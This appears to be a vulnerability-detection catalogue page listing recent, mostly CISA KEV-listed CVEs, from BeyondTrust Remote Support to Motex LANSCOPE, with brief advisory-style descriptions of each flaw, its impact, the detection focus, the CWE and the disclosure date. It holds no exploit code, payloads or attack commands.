CVE-2026-1731 is a critical (CVSS 9.8) pre-authentication remote code execution vulnerability in BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA). By sending specially crafted requests, an unauthenticated remote attacker can execute operating system commands in the context of the web application site user. BeyondTrust Remote Support is widely deployed in enterprise and SMB environments for helpdesk and IT support operations, creating direct privileged access to end-user machines. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalogue, with active exploitation observed in the wild (GreyNoise confirmed reconnaissance scanning). A working proof-of-concept exploit is publicly available on GitHub. Successful exploitation provides attackers with a foothold in the support infrastructure, enabling lateral movement to all machines with active or historical BeyondTrust support sessions.
vendor: BeyondTrust product: Remote Support, Privileged Remote Access cwe: CWE-78 disclosed: Feb 6, 2026 | 9.8 critical | write-up soon
- CVE-2025-11953 KEV
React Native Community CLI OS Command Injection (CVE-2025-11953)
Detects exploitation of CVE-2025-11953, an OS command injection vulnerability (CWE-78) in the React Native Community CLI. An attacker who can influence arguments or configuration consumed by the React Native CLI can inject arbitrary OS commands that execute with the privileges of the developer or CI/CD process invoking the CLI. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: React Native Community product: CLI cwe: CWE-78 disclosed: Feb 5, 2026 | unscored | write-up soon
- CVE-2026-24423 KEV
SmarterMail Missing Authentication for Critical Function (CVE-2026-24423)
Detects exploitation of CVE-2026-24423, a missing authentication vulnerability (CWE-306) in SmarterTools SmarterMail. This KEV-listed vulnerability allows unauthenticated attackers to access critical functions in SmarterMail, potentially enabling unauthorized administrative access, data exfiltration, or further lateral movement. Detection focuses on unauthenticated access patterns to administrative and critical API endpoints.
vendor: SmarterTools product: SmarterMail cwe: CWE-306 disclosed: Feb 5, 2026 | unscored | write-up soon
- CVE-2019-19006 KEV
Sangoma FreePBX Remote Admin Authentication Bypass (CVE-2019-19006)
CVE-2019-19006 is an improper authentication vulnerability (CWE-287) in Sangoma FreePBX that allows remote unauthenticated attackers to bypass administrative authentication controls. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation grants attackers full administrative access to the FreePBX VoIP management interface, enabling call interception, configuration tampering, toll fraud, and potential lateral movement into the broader network.
vendor: Sangoma product: FreePBX cwe: CWE-287 disclosed: Feb 3, 2026 | unscored | write-up soon
- CVE-2021-39935 KEV
GitLab SSRF via Import Feature (CVE-2021-39935)
CVE-2021-39935 is a Server-Side Request Forgery (SSRF) vulnerability in GitLab Community and Enterprise Editions. An attacker can abuse GitLab's project import or integration features to cause the server to issue arbitrary HTTP requests to internal network resources, enabling reconnaissance, metadata service access, and potential lateral movement within cloud-hosted or on-premises GitLab deployments. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: GitLab product: Community and Enterprise Editions cwe: CWE-918 disclosed: Feb 3, 2026 | unscored | write-up soon
- CVE-2025-40551 KEV
CVE-2025-40551 — SolarWinds Web Help Desk Deserialization RCE
Detects exploitation of CVE-2025-40551, a deserialization of untrusted data vulnerability in SolarWinds Web Help Desk. Successful exploitation allows unauthenticated or low-privileged attackers to achieve remote code execution on the WHD server. This CVE is listed in CISA KEV, indicating active exploitation in the wild.
vendor: SolarWinds product: Web Help Desk cwe: CWE-502 disclosed: Feb 3, 2026 | unscored | write-up soon
- CVE-2025-64328 KEV
Sangoma FreePBX OS Command Injection (CVE-2025-64328)
Detects exploitation of an OS command injection vulnerability in Sangoma FreePBX. An authenticated or unauthenticated attacker may inject arbitrary OS commands through vulnerable FreePBX web interfaces or API endpoints, leading to remote code execution on the underlying Linux host. This vulnerability is tracked as CVE-2025-64328 and is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Sangoma product: FreePBX cwe: CWE-78 disclosed: Feb 3, 2026 | unscored | write-up soon
- CVE-2026-1281 KEV
CVE-2026-1281 — Ivanti EPMM Code Injection Exploitation
Detects exploitation of CVE-2026-1281, a code injection vulnerability (CWE-94) in Ivanti Endpoint Manager Mobile (EPMM). This KEV-listed vulnerability allows remote attackers to inject and execute arbitrary code via the EPMM management interface. Detection focuses on anomalous process execution, suspicious web shell activity, and unexpected outbound connections from EPMM server infrastructure.
vendor: Ivanti product: Endpoint Manager Mobile (EPMM) cwe: CWE-94 disclosed: Jan 29, 2026 | unscored | write-up soon
- CVE-2026-24858 KEV
Fortinet Multiple Products Authentication Bypass via Alternate Path or Channel (CVE-2026-24858)
Detects exploitation of CVE-2026-24858, an authentication bypass vulnerability (CWE-288) affecting multiple Fortinet products. Attackers abuse an alternate authentication path or channel — specifically SSO abuse on FortiOS — to bypass normal authentication controls and gain unauthorized access. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: Fortinet product: Multiple Products cwe: CWE-288 disclosed: Jan 27, 2026 | unscored | write-up soon
- CVE-2018-14634 KEV
Linux Kernel Integer Overflow in create_elf_tables (CVE-2018-14634)
CVE-2018-14634 is an integer overflow vulnerability in the Linux kernel's create_elf_tables() function, triggered during process execution via the execve syscall. A local unprivileged attacker can exploit this flaw to achieve privilege escalation to root by crafting a binary with an extremely large argument list. This vulnerability exists in Linux kernel versions 2.6.x through 4.14.x and is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Linux product: Kernel cwe: CWE-190 disclosed: Jan 26, 2026 | unscored | write-up soon
- CVE-2025-52691 KEV
SmarterMail Unrestricted File Upload Exploitation (CVE-2025-52691)
Detects exploitation of CVE-2025-52691, an unrestricted file upload vulnerability in SmarterTools SmarterMail. This vulnerability allows attackers to upload files with dangerous types (e.g., web shells, executables) to the mail server, potentially enabling remote code execution. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: SmarterTools product: SmarterMail cwe: CWE-434 disclosed: Jan 26, 2026 | unscored | write-up soon
- CVE-2026-21509 KEV
Microsoft Office Security Feature Bypass (CVE-2026-21509)
Detects exploitation of CVE-2026-21509, a security feature bypass vulnerability in Microsoft Office classified under CWE-807 (Reliance on Untrusted Inputs in a Security Decision). This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to bypass security controls within Office applications, potentially enabling malicious document execution without expected security warnings or Protected View enforcement.
vendor: Microsoft product: Office cwe: CWE-807 disclosed: Jan 26, 2026 | unscored | write-up soon
- CVE-2026-23760 KEV
SmarterMail Authentication Bypass via Alternate Path or Channel (CVE-2026-23760)
Detects exploitation of CVE-2026-23760, an authentication bypass vulnerability (CWE-288) in SmarterTools SmarterMail. Attackers can access protected functionality through an alternate path or channel without valid credentials, potentially leading to unauthorized mailbox access, data exfiltration, or lateral movement. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: SmarterTools product: SmarterMail cwe: CWE-288 disclosed: Jan 26, 2026 | unscored | write-up soon
- CVE-2026-24061 KEV
GNU InetUtils Argument Injection Vulnerability (CVE-2026-24061)
CVE-2026-24061 is an argument injection vulnerability (CWE-88) in GNU InetUtils affecting utilities such as telnet, ftp, rsh, rcp, and related tools. An attacker who can control arguments passed to InetUtils binaries may inject additional command-line options, potentially enabling unauthorized network access, privilege escalation, or lateral movement. This vulnerability is listed on the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: GNU product: InetUtils cwe: CWE-88 disclosed: Jan 26, 2026 | unscored | write-up soon
- CVE-2024-37079 KEV
VMware vCenter Server Out-of-bounds Write (CVE-2024-37079)
Detects exploitation attempts targeting CVE-2024-37079, an out-of-bounds write vulnerability (CWE-787) in Broadcom VMware vCenter Server. This KEV-listed vulnerability allows unauthenticated remote attackers to trigger memory corruption via malformed DCERPC requests to the vCenter management interface, potentially leading to remote code execution with SYSTEM-level privileges on the vCenter appliance.
vendor: Broadcom product: VMware vCenter Server cwe: CWE-787 disclosed: Jan 23, 2026 | unscored | write-up soon
- CVE-2025-31125 KEV
CVE-2025-31125: Vite Dev Server Improper Access Control
Detects exploitation of CVE-2025-31125, an improper access control vulnerability in the Vite (Vitejs) dev server, classified under CWE-200 (Information Exposure) and CWE-284 (Improper Access Control). The vulnerability allows unauthorized access to sensitive files outside the intended serve root. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Vite product: Vitejs cwe: CWE-200, CWE-284 disclosed: Jan 22, 2026 | unscored | write-up soon
- CVE-2025-34026 KEV
Versa Concerto Improper Authentication (CVE-2025-34026)
Detects exploitation attempts targeting CVE-2025-34026, an improper authentication vulnerability (CWE-288) in the Versa Concerto SD-WAN orchestration platform. This vulnerability allows attackers to bypass authentication controls, potentially enabling unauthorized access to the Concerto management interface. It is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Versa product: Concerto cwe: CWE-288 disclosed: Jan 22, 2026 | unscored | write-up soon
- CVE-2025-54313 KEV
Prettier eslint-config-prettier Embedded Malicious Code (CVE-2025-54313)
Detects exploitation indicators related to CVE-2025-54313, a supply chain compromise affecting the eslint-config-prettier npm package (Prettier). The package was trojanized with embedded malicious code (CWE-506), enabling arbitrary code execution during npm install or build processes. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Prettier product: eslint-config-prettier cwe: CWE-506 disclosed: Jan 22, 2026 | unscored | write-up soon
- CVE-2025-68645 KEV
Synacor Zimbra Collaboration Suite PHP Remote File Inclusion (CVE-2025-68645)
Detects exploitation of CVE-2025-68645, a PHP Remote File Inclusion (RFI) vulnerability in Synacor Zimbra Collaboration Suite (ZCS). CWE-98 class vulnerabilities allow attackers to inject and execute remote PHP files via unsanitized user-controlled input passed to PHP file inclusion functions, enabling arbitrary code execution in the context of the web server process. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: Synacor product: Zimbra Collaboration Suite (ZCS) cwe: CWE-98 disclosed: Jan 22, 2026 | unscored | write-up soon
- CVE-2026-20045 KEV
CVE-2026-20045: Cisco Unified Communications Manager Code Injection
Detects exploitation attempts targeting CVE-2026-20045, a code injection vulnerability (CWE-94) in Cisco Unified Communications Manager. This KEV-listed vulnerability allows remote attackers to inject and execute arbitrary code. Detection focuses on anomalous process execution, unexpected web shell activity, and suspicious outbound connections originating from CUCM processes.
vendor: Cisco product: Unified Communications Manager cwe: CWE-94 disclosed: Jan 21, 2026 | unscored | write-up soon
- CVE-2026-20805 KEV
Microsoft Windows Information Disclosure (CVE-2026-20805)
Detects exploitation of CVE-2026-20805, a Microsoft Windows information disclosure vulnerability (CWE-200) that allows attackers to access sensitive memory or kernel data. This vulnerability is actively exploited in the wild (CISA KEV). Successful exploitation may expose credentials, memory contents, or system information that enables privilege escalation or lateral movement.
vendor: Microsoft product: Windows cwe: CWE-200 disclosed: Jan 13, 2026 | unscored | write-up soon
- CVE-2025-8110 KEV
Gogs Path Traversal Vulnerability (CVE-2025-8110)
Detects exploitation attempts targeting CVE-2025-8110, a path traversal vulnerability (CWE-22) in the Gogs self-hosted Git service. Attackers can craft malicious HTTP requests containing directory traversal sequences to read arbitrary files outside the intended web root, potentially exposing sensitive configuration files, SSH keys, or repository data. This vulnerability is listed in the CISA KEV catalog, indicating active exploitation in the wild.
vendor: Gogs product: Gogs cwe: CWE-22 disclosed: Jan 12, 2026 | unscored | write-up soon
- CVE-2009-0556 KEV
Microsoft Office PowerPoint Code Injection (CVE-2009-0556)
Detects exploitation attempts targeting CVE-2009-0556, a code injection vulnerability in Microsoft Office PowerPoint. Attackers can exploit this vulnerability via crafted PowerPoint files to execute arbitrary code in the context of the logged-in user. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Microsoft product: Office cwe: CWE-94 disclosed: Jan 7, 2026 | unscored | write-up soon
- CVE-2025-37164 KEV
HPE OneView Code Injection Exploitation (CVE-2025-37164)
Detects exploitation of CVE-2025-37164, a code injection vulnerability (CWE-94) in Hewlett Packard Enterprise OneView. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog and allows attackers to inject and execute arbitrary code through the OneView management platform, potentially compromising datacenter infrastructure management.
vendor: Hewlett Packard Enterprise (HPE) product: OneView cwe: CWE-94 disclosed: Jan 7, 2026 | unscored | write-up soon
- CVE-2025-14847 KEV
MongoDB Improper Handling of Length Parameter Inconsistency (CVE-2025-14847)
Detects exploitation attempts targeting CVE-2025-14847, an improper handling of length parameter inconsistency vulnerability (CWE-130) in MongoDB and MongoDB Server. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may craft malformed requests with inconsistent length parameters to cause unexpected server behavior, potentially leading to denial of service, data corruption, or unauthorized access.
vendor: MongoDB product: MongoDB and MongoDB Server cwe: CWE-130 disclosed: Dec 29, 2025 | unscored | write-up soon
- CVE-2023-52163 KEV
Digiever DS-2105 Pro Missing Authorization Exploitation (CVE-2023-52163)
Detects exploitation of CVE-2023-52163, a missing authorization vulnerability (CWE-862) in Digiever DS-2105 Pro NVR devices. This KEV-listed vulnerability allows unauthenticated attackers to access restricted functionality or administrative interfaces without proper credential validation. Threat actors actively exploit exposed NVR devices for initial access, lateral movement, and persistence in OT/IoT environments.
vendor: Digiever product: DS-2105 Pro cwe: CWE-862 disclosed: Dec 22, 2025 | unscored | write-up soon
- CVE-2025-14733 KEV
CVE-2025-14733: WatchGuard Firebox Out-of-Bounds Write Exploitation
Detects exploitation attempts targeting CVE-2025-14733, an out-of-bounds write vulnerability (CWE-787) in WatchGuard Firebox devices. This vulnerability is actively exploited in the wild (CISA KEV) and may allow remote code execution or device compromise. Detection focuses on anomalous management interface activity, unexpected process crashes, and network indicators consistent with exploitation.
vendor: WatchGuard product: Firebox cwe: CWE-787 disclosed: Dec 19, 2025 | unscored | write-up soon
- CVE-2025-20393 KEV
CVE-2025-20393 — Cisco Multiple Products Improper Input Validation (KEV)
Detects exploitation attempts targeting CVE-2025-20393, an improper input validation vulnerability (CWE-20) affecting multiple Cisco products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation. Attackers may leverage this flaw to bypass security controls, execute unauthorized commands, or gain elevated access to affected Cisco appliances.
vendor: Cisco product: Multiple Products cwe: CWE-20 disclosed: Dec 17, 2025 | unscored | write-up soon
- CVE-2025-40602 KEV
CVE-2025-40602 - SonicWall SMA1000 Missing Authorization Exploitation
Detects exploitation attempts targeting CVE-2025-40602, a missing authorization vulnerability (CWE-862) combined with execution with unnecessary privileges (CWE-250) in SonicWall SMA1000 appliances. This KEV-listed vulnerability allows unauthenticated or insufficiently privileged attackers to access restricted resources or execute privileged operations. Detection focuses on anomalous HTTP requests to SMA1000 management interfaces, unexpected authentication bypass patterns, and post-exploitation activity indicative of privilege escalation on SMA gateway infrastructure.
vendor: SonicWall product: SMA1000 appliance cwe: CWE-862, CWE-250 disclosed: Dec 17, 2025 | unscored | write-up soon
- CVE-2025-59374 KEV
ASUS Live Update Embedded Malicious Code (CVE-2025-59374)
Detects indicators of compromise related to CVE-2025-59374, a supply chain attack where ASUS Live Update software contained embedded malicious code (CWE-506). This mirrors the ShadowHammer operation pattern where threat actors compromised the ASUS software update infrastructure to deliver backdoored updates to endpoints. Detection focuses on suspicious child processes spawned by ASUS Live Update, anomalous network connections, and staging activity consistent with backdoor execution.
vendor: ASUS product: Live Update cwe: CWE-506 disclosed: Dec 17, 2025 | unscored | write-up soon
- CVE-2025-59718 KEV
Fortinet Multiple Products Improper Verification of Cryptographic Signature (CVE-2025-59718)
Detects exploitation of CVE-2025-59718, an improper verification of cryptographic signature vulnerability (CWE-347) affecting multiple Fortinet products. This vulnerability, listed in CISA's Known Exploited Vulnerabilities catalog, allows attackers to bypass signature validation checks, potentially enabling unsigned firmware/software installation, man-in-the-middle attacks on update channels, or code execution with elevated privileges on affected Fortinet appliances.
vendor: Fortinet product: Multiple Products cwe: CWE-347 disclosed: Dec 16, 2025 | unscored | write-up soon
- CVE-2025-14611 KEV
Gladinet CentreStack and Triofox Hard-Coded Cryptographic Key Exploitation
Detects exploitation of CVE-2025-14611, a hard-coded cryptographic key vulnerability (CWE-798) in Gladinet CentreStack and Triofox. Attackers who obtain the static machineKey or cryptographic seed can forge ASP.NET ViewState tokens or authentication artifacts, enabling remote code execution via deserialization attacks without valid credentials. This vulnerability is actively exploited and listed on CISA KEV.
vendor: Gladinet product: CentreStack and Triofox cwe: CWE-798 disclosed: Dec 15, 2025 | unscored | write-up soon
- CVE-2025-43529 KEV
Apple WebKit Use-After-Free Exploitation Attempt (CVE-2025-43529)
Detects exploitation attempts targeting CVE-2025-43529, a use-after-free vulnerability in Apple's WebKit browser engine affecting multiple Apple products. This vulnerability is actively exploited in the wild (CISA KEV) and can lead to arbitrary code execution when a user visits a maliciously crafted webpage. Attackers may leverage this flaw to achieve initial access or privilege escalation on macOS, iOS, and iPadOS devices.
vendor: Apple product: Multiple Products cwe: CWE-416 disclosed: Dec 15, 2025 | unscored | write-up soon
- CVE-2018-4063 KEV
Sierra Wireless AirLink ALEOS Unrestricted File Upload Exploitation
Detects exploitation of CVE-2018-4063, an unrestricted file upload vulnerability (CWE-434) in Sierra Wireless AirLink ALEOS firmware. Attackers can upload files with dangerous types via the ACEmanager web interface, enabling remote code execution on cellular gateway devices. This vulnerability is listed in CISA KEV and has been exploited in the wild against critical infrastructure.
vendor: Sierra Wireless product: AirLink ALEOS cwe: CWE-434 disclosed: Dec 12, 2025 | unscored | write-up soon
- CVE-2025-14174 KEV
CVE-2025-14174: Google Chromium Out of Bounds Memory Access Exploitation
Detects exploitation of CVE-2025-14174, an out-of-bounds memory access vulnerability in Google Chromium. This vulnerability is actively exploited in the wild (CISA KEV) and can allow attackers to execute arbitrary code or escape the browser sandbox via a crafted web page. Detection focuses on abnormal Chromium process behavior including child process spawning, memory anomalies, and post-exploitation indicators.
vendor: Google product: Chromium disclosed: Dec 12, 2025 | unscored | write-up soon
- CVE-2025-58360 KEV
OSGeo GeoServer XXE Injection Exploitation Attempt
Detects exploitation attempts targeting CVE-2025-58360, an Improper Restriction of XML External Entity (XXE) Reference vulnerability in OSGeo GeoServer. Attackers can submit malicious XML payloads to GeoServer endpoints to perform server-side request forgery, read local files, or exfiltrate data via out-of-band DNS/HTTP channels. This CVE is listed on CISA's Known Exploited Vulnerabilities catalog.
vendor: OSGeo product: GeoServer cwe: CWE-611 disclosed: Dec 11, 2025 | unscored | write-up soon
- CVE-2025-6218 KEV
CVE-2025-6218: RARLAB WinRAR Path Traversal Exploitation
Detects exploitation of CVE-2025-6218, a path traversal vulnerability in RARLAB WinRAR. Attackers can craft malicious archive files that, when extracted, write files outside the intended extraction directory, enabling arbitrary file placement on the victim system. This vulnerability is actively exploited in the wild (CISA KEV) and can lead to code execution, persistence, or privilege escalation by dropping malicious files to sensitive locations such as startup folders, system directories, or application data paths.
vendor: RARLAB product: WinRAR cwe: CWE-22 disclosed: Dec 9, 2025 | unscored | write-up soon
- CVE-2025-62221 KEV
CVE-2025-62221 Microsoft Windows Use After Free Exploitation
Detects exploitation attempts targeting CVE-2025-62221, a use-after-free vulnerability in Microsoft Windows. This class of memory corruption flaw allows attackers to execute arbitrary code by manipulating freed memory objects. The CVE is a CISA KEV entry, so active exploitation in the wild has been confirmed. Detection focuses on anomalous process behavior, kernel-mode memory corruption indicators, crash telemetry, and privilege escalation patterns consistent with UAF exploitation chains.
vendor: Microsoft product: Windows cwe: CWE-416 disclosed: Dec 9, 2025 | unscored | write-up soon
- CVE-2022-37055 KEV
CVE-2022-37055 D-Link Router Buffer Overflow Exploitation
Detects exploitation attempts targeting CVE-2022-37055, a buffer overflow vulnerability (CWE-120) in D-Link routers. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may exploit this vulnerability to achieve remote code execution on affected D-Link routers, potentially enabling network pivoting, persistent access, or botnet enrollment.
vendor: D-Link product: Routers cwe: CWE-120 disclosed: Dec 8, 2025 | unscored | write-up soon
- CVE-2025-66644 KEV
Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644)
Detects exploitation of CVE-2025-66644, an OS command injection vulnerability in Array Networks ArrayOS AG. This vulnerability allows remote attackers to execute arbitrary operating system commands through the Array Networks SSL VPN/ZTNA gateway. The flaw is tracked by CISA as a Known Exploited Vulnerability (KEV), indicating active in-the-wild exploitation. Attackers may leverage this to gain initial access, establish persistence, or pivot laterally within the network.
vendor: Array Networks product: ArrayOS AG cwe: CWE-78 disclosed: Dec 8, 2025 | unscored | write-up soon
- CVE-2025-55182 KEV
CVE-2025-55182 — Meta React Server Components Remote Code Execution
Detects exploitation of CVE-2025-55182, a critical remote code execution vulnerability in Meta React Server Components. This vulnerability allows attackers to achieve server-side code execution by abusing the React Server Components protocol, potentially leading to full server compromise. The vulnerability is actively exploited in the wild (CISA KEV).
vendor: Meta product: React Server Components disclosed: Dec 5, 2025 cvss: unscored write-up soon
- CVE-2021-26828 KEV
CVE-2021-26828: OpenPLC ScadaBR Unrestricted File Upload RCE
Detects exploitation of CVE-2021-26828, an unrestricted file upload vulnerability in OpenPLC ScadaBR that allows authenticated attackers to upload files with dangerous types (e.g., JSP, PHP, WAR) to the server, leading to remote code execution. ScadaBR is a SCADA/HMI web application widely used in industrial control systems. This vulnerability is actively exploited in the wild and listed in CISA KEV.
vendor: OpenPLC product: ScadaBR cwe: CWE-434 disclosed: Dec 3, 2025 cvss: unscored write-up soon
- CVE-2021-26829 KEV
OpenPLC ScadaBR Cross-Site Scripting (XSS) Exploitation Detected
Detects exploitation attempts targeting CVE-2021-26829, a stored or reflected cross-site scripting vulnerability in OpenPLC ScadaBR. ScadaBR is a SCADA/HMI platform used in industrial control environments. Successful exploitation allows attackers to inject malicious scripts into the web interface, potentially enabling session hijacking, credential theft, or lateral movement within OT/ICS environments. This CVE is listed on CISA's Known Exploited Vulnerabilities catalog.
vendor: OpenPLC product: ScadaBR cwe: CWE-79 disclosed: Nov 28, 2025 cvss: unscored write-up soon
- CVE-2025-13223 KEV
Google Chromium V8 Type Confusion Exploitation (CVE-2025-13223)
Detects exploitation attempts targeting CVE-2025-13223, a type confusion vulnerability (CWE-843) in Google Chromium's V8 JavaScript engine. This KEV-listed vulnerability allows remote attackers to execute arbitrary code via a crafted HTML page. Exploitation typically involves a malicious web page triggering memory corruption through confused object type handling in V8, leading to sandbox escape or remote code execution within the browser process.
vendor: Google product: Chromium V8 cwe: CWE-843 disclosed: Nov 19, 2025 cvss: unscored write-up soon
- CVE-2025-68670 Public PoC PoC
xrdp Unauthenticated Stack Buffer Overflow via RDP Connection Sequence
CVE-2025-68670 is a critical (CVSS 9.1) unauthenticated stack-based buffer overflow vulnerability in xrdp, the open-source RDP server widely deployed on Linux systems. The vulnerability stems from improper bounds checking when processing user domain information during the RDP connection sequence (pre-authentication). An unauthenticated remote attacker can overwrite the stack buffer and return address, potentially redirecting execution flow to execute arbitrary code. Fixed in xrdp v0.10.5. The impact is partially mitigated if the binary was compiled with stack canary protection, though the advisory warns against relying on this for production systems. xrdp is commonly used to provide RDP access to Ubuntu, Debian, CentOS, and other Linux servers — including cloud VMs, developer workstations, and Linux-based infrastructure in SMB environments. Exploitation requires no credentials and only network access to port 3389.
vendor: neutrinolabs, xrdp product: xrdp cwe: CWE-121 disclosed: Nov 18, 2025 cvss: 9.1 critical write-up soon
- CVE-2025-58034 KEV
Fortinet FortiWeb OS Command Injection (CVE-2025-58034)
Detects exploitation of CVE-2025-58034, an OS command injection vulnerability (CWE-78) in Fortinet FortiWeb. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through FortiWeb's management or inspection interfaces, potentially leading to full appliance compromise, lateral movement, and persistent access to network segmentation points.
vendor: Fortinet product: FortiWeb cwe: CWE-78 disclosed: Nov 18, 2025 cvss: unscored write-up soon
- CVE-2025-64446 KEV
CVE-2025-64446: Fortinet FortiWeb Path Traversal Exploitation
Detects exploitation attempts targeting CVE-2025-64446, a path traversal vulnerability (CWE-23) in Fortinet FortiWeb. This vulnerability allows attackers to traverse directory boundaries and access files outside the intended web root, potentially exposing sensitive configuration files, credentials, or system files. The vulnerability is listed in CISA KEV indicating active exploitation in the wild.
vendor: Fortinet product: FortiWeb cwe: CWE-23 disclosed: Nov 14, 2025 cvss: unscored write-up soon
- CVE-2025-12480 KEV
Gladinet Triofox Improper Access Control Exploitation Detected
Detects exploitation attempts targeting CVE-2025-12480, an improper access control vulnerability (CWE-284) in Gladinet Triofox. This vulnerability allows attackers to bypass access controls, potentially gaining unauthorized access to file storage and collaboration resources. Listed as a CISA Known Exploited Vulnerability, active exploitation has been observed in the wild.
vendor: Gladinet product: Triofox cwe: CWE-284 disclosed: Nov 12, 2025 cvss: unscored write-up soon
- CVE-2025-62215 KEV
CVE-2025-62215 Microsoft Windows Race Condition Exploitation
Detects exploitation attempts of CVE-2025-62215, a race condition vulnerability (CWE-362) in Microsoft Windows. This KEV-listed vulnerability can be abused by attackers to gain elevated privileges or execute arbitrary code by winning a time-of-check to time-of-use (TOCTOU) race condition. Detection focuses on suspicious process creation patterns, handle manipulation, and abnormal thread timing indicative of race condition exploitation.
vendor: Microsoft product: Windows cwe: CWE-362 disclosed: Nov 12, 2025 cvss: unscored write-up soon
- CVE-2025-9242 KEV
WatchGuard Firebox Out-of-Bounds Write Exploitation (CVE-2025-9242)
Detects exploitation attempts targeting CVE-2025-9242, an out-of-bounds write vulnerability (CWE-787) in WatchGuard Firebox appliances. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation may allow remote code execution or denial of service on affected Firebox devices.
vendor: WatchGuard product: Firebox cwe: CWE-787 disclosed: Nov 12, 2025 cvss: unscored write-up soon
- CVE-2025-11371 KEV
Gladinet CentreStack/Triofox Unauthorized File/Directory Access (CVE-2025-11371)
Detects exploitation of CVE-2025-11371, a CWE-552 vulnerability in Gladinet CentreStack and Triofox where files or directories are accessible to external parties without proper authorization. This CISA KEV-listed vulnerability allows unauthenticated or unauthorized actors to access sensitive files and directories exposed by the affected file-sharing platform.
vendor: Gladinet product: CentreStack and Triofox cwe: CWE-552 disclosed: Nov 4, 2025 cvss: unscored write-up soon
- CVE-2025-48703 KEV
CVE-2025-48703 - CWP Control Web Panel OS Command Injection
Detects exploitation of CVE-2025-48703, an OS command injection vulnerability (CWE-78) in CWP Control Web Panel. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through the web panel interface, potentially leading to full server compromise.
vendor: CWP product: Control Web Panel cwe: CWE-78 disclosed: Nov 4, 2025 cvss: unscored write-up soon
- CVE-2025-24893 KEV
CVE-2025-24893 XWiki Platform Eval Injection Exploitation
Detects exploitation of CVE-2025-24893, an eval injection vulnerability (CWE-95) in XWiki Platform that allows remote code execution via server-side template injection. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers can craft malicious wiki content or URLs containing Groovy/Velocity template expressions that are evaluated server-side, leading to arbitrary code execution under the XWiki process context.
vendor: XWiki product: Platform cwe: CWE-95 disclosed: Oct 30, 2025 cvss: unscored write-up soon
- CVE-2025-41244 KEV
CVE-2025-41244 - VMware Aria Operations & VMware Tools Privilege Escalation via Unsafe Actions
Detects exploitation of CVE-2025-41244, a privilege escalation vulnerability in Broadcom VMware Aria Operations and VMware Tools caused by privileges defined with unsafe actions (CWE-267). This KEV-listed vulnerability allows attackers with lower-privileged access to escalate privileges by abusing overly permissive or unsafe role/action definitions within VMware Aria Operations or VMware Tools components. Indicators include anomalous administrative API calls, unexpected privilege changes in VMware management interfaces, and suspicious process activity from VMware Tools guest utilities.
vendor: Broadcom product: VMware Aria Operations and VMware Tools cwe: CWE-267 disclosed: Oct 30, 2025 cvss: unscored write-up soon
- CVE-2025-6204 KEV
CVE-2025-6204 — Dassault Systèmes DELMIA Apriso Code Injection
Detects exploitation of CVE-2025-6204, a code injection vulnerability (CWE-94) in Dassault Systèmes DELMIA Apriso. This vulnerability allows attackers to inject and execute arbitrary code through the Apriso application layer. It is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation can lead to remote code execution, lateral movement, and full compromise of manufacturing execution system (MES) environments.
vendor: Dassault Systèmes product: DELMIA Apriso cwe: CWE-94 disclosed: Oct 28, 2025 cvss: unscored write-up soon
- CVE-2025-6205 KEV
Dassault Systèmes DELMIA Apriso Missing Authorization (CVE-2025-6205)
Detects exploitation attempts targeting CVE-2025-6205, a missing authorization vulnerability (CWE-862) in Dassault Systèmes DELMIA Apriso. This vulnerability allows unauthenticated or low-privileged attackers to access protected resources or perform actions without proper authorization checks. Listed as a CISA KEV, indicating active exploitation in the wild.
vendor: Dassault Systèmes product: DELMIA Apriso cwe: CWE-862 disclosed: Oct 28, 2025 cvss: unscored write-up soon
- CVE-2025-54236 KEV
Adobe Commerce / Magento Improper Input Validation (CVE-2025-54236)
Detects exploitation of CVE-2025-54236, an improper input validation vulnerability in Adobe Commerce and Magento. This KEV-listed vulnerability allows attackers to submit maliciously crafted input to Commerce/Magento endpoints, potentially leading to remote code execution, unauthorized data access, or store compromise. Detection focuses on anomalous HTTP request patterns to Magento/Commerce endpoints, unexpected PHP execution, and indicators of post-exploitation activity.
vendor: Adobe product: Commerce and Magento cwe: CWE-20 disclosed: Oct 24, 2025 cvss: unscored write-up soon
- CVE-2025-59287 KEV
Microsoft WSUS Deserialization of Untrusted Data (CVE-2025-59287)
Detects exploitation of CVE-2025-59287, a deserialization of untrusted data vulnerability in Microsoft Windows Server Update Services (WSUS). Successful exploitation allows an attacker to execute arbitrary code in the context of the WSUS service by sending a crafted serialized object. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Microsoft product: Windows cwe: CWE-502 disclosed: Oct 24, 2025 cvss: unscored write-up soon
- CVE-2025-61932 KEV
Motex LANSCOPE Endpoint Manager - Improper Verification of Communication Channel Source (CVE-2025-61932)
